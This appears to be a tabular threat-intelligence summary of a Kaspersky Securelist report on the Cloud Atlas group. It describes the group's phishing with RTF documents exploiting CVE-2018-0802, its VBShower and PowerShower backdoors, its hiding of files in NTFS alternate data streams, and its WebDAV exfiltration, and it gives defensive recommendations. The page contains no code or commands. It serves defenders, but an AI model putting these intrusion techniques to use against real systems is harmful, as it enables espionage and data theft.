Press ESC to close

Cloud Atlas seen using a new tool in its attacks

Category Details
Threat Actors • Cloud Atlas (known since 2014).
Campaign Overview • Cloud Atlas targets Eastern Europe and Central Asia.
• Infected victims via phishing emails exploiting CVE-2018-0802.
• New toolset used in 2024 involving the VBShower and PowerShower backdoors.
Target Regions • Eastern Europe, Central Asia
Methodology • Victims receive phishing emails with malicious documents exploiting a formula editor vulnerability.
• Malicious RTF template downloads HTA file which runs backdoors (VBShower, PowerShower).
• Use of NTFS ADS to store and execute files.
Product Targeted • Windows systems (via exploitation of vulnerabilities).
Malware Reference VBShower: Backdoor, Downloader, File Exfiltration.
PowerShower: Similar functionality to VBShower, focused on downloading and executing scripts.
Tools Used VBShower: Decrypts and executes backdoors, installs additional malware.
PowerShower: Downloads additional PowerShell scripts.
Vulnerabilities Exploited CVE-2018-0802: Vulnerability in Microsoft Office formula editor for code execution.
TTPs • Phishing emails containing malicious RTF files.
• Use of NTFS alternate data streams (ADS) for hiding malware.
• Download and execute additional payloads.
• File exfiltration via WebDAV to cloud services.
Attribution • Cloud Atlas (also known as OCEAN Buffalo).
Recommendations • Improve email filtering and vulnerability patching.
• Regularly monitor for unusual processes and registry changes.
• Use endpoint detection tools to detect and block PowerShell scripts and unauthorized backdoors.
Source Securelist by Kaspersky 

Read full article: https://securelist.com/cloud-atlas-attacks-with-new-backdoor-vbcloud/115103/

The above summary has been generated by an AI language model

Stay Updated with Our Newsletter

Source: Securelist by Kaspersky

Published on: December 24, 2024

Leave a Reply

Your email address will not be published. Required fields are marked *